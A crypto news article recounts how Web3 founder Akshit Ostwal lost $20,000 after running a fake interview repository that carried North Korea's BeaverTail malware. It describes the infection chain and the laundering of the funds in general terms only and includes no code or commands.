How a Web3 Founder Fell Victim to The Notorious North Korean “BeaverTail” Malware

Web3 founder Akshit Ostwal lost $20K to North Korea’s BeaverTail malware in a sophisticated crypto scam targeting developers.

The Web3 space recently faced a harsh reminder this week. Akshit Ostwal, the co-founder of Epoch Protocol, lost over $20,000 after helping a friend with what appeared to be a standard technical interview.

This incident only shows the ongoing campaign by North Korean hackers to target the very people building the future of the internet.

How the High Stakes Crypto Scam Started

The trouble started last year on December 18, with a simple request from a friend. This friend was applying for a new job and asked Ostwal to review a code repository.

The friend believed the code came from a legitimate recruiter at a prominent firm.

Ostwal wanted to be helpful and ran the third-party code on his local machine.

https://t.co/FCHfkGQdeA

— (AK) Akshit | Epoch Protocol 🦇🔊🛡️ (@OstwalAk) January 8, 2026

This act of kindness opened the door for the “Contagious Interview” campaign, which was linked to the notorious state-sponsored Lazarus Group from North Korea.

Instead of mass phishing, these attackers now use high-touch social engineering to trick developers into running tampered files.

Anatomy of the BeaverTail Malware Attack

Ostwal noted in an X post that once he executed the code, a silent infection chain started in his machine.

Security experts at Seal911 identified the main culprit as the BeaverTail malware. This JavaScript-based piece of software is often used with a secondary backdoor called InvisibleFerret.

When used together, they become an almost unstoppable crypto-stealing duo for any developer environment.

According to Ostwal, the malware worked in several stages:

The first was the automatic execution, where as soon as the local server started, a file named analytics.controller.js started to run a hidden function.

Next, the script immediately sent Ostwal’s system environment variables to the attacker. This included sensitive items like database URLs and private keys.

Finally, the attacker’s server sent back malicious JavaScript, which executed with root permissions on the infected device.

Before long, $20,000 had gone down the drain.

Why the Crypto Scam Remained Hidden

Notably, the hackers did not move the money right away. Instead, they likely maintained a backdoor on Ostwal’s device for nearly a month. During this time, they wrote custom scripts to unstake his DeFi portfolio.

They also waited for the perfect moment to “sweep” all his assets in a single transaction.

The attackers eventually targeted both EVM-compatible wallets and Solana accounts.

They used tools like Near-Intents and the Rubic Exchange to move the stolen funds. This “chain-hopping” tactic makes it difficult for investigators to track the money across different blockchains.

Related Reading: $3.4 Billion Stolen: North Korea Drives Record $2 Billion Crypto Theft Year This year

The Record-Breaking Scale of North Korean Theft

Ostwal’s experience is part of a massive surge in cybercrime. Data from the 2026 Crypto Crime Report indicates that North Korean hackers stole $2.02 billion last year alone.

This figure accounts for the majority of the $3.4 billion lost to crypto theft globally last year.

The “Contagious Interview” campaign has proven remarkably effective. Hackers create hundreds of malicious NPM packages and use AI to generate human-sounding interview responses.

In other words, they have essentially turned the job market into a minefield for software engineers.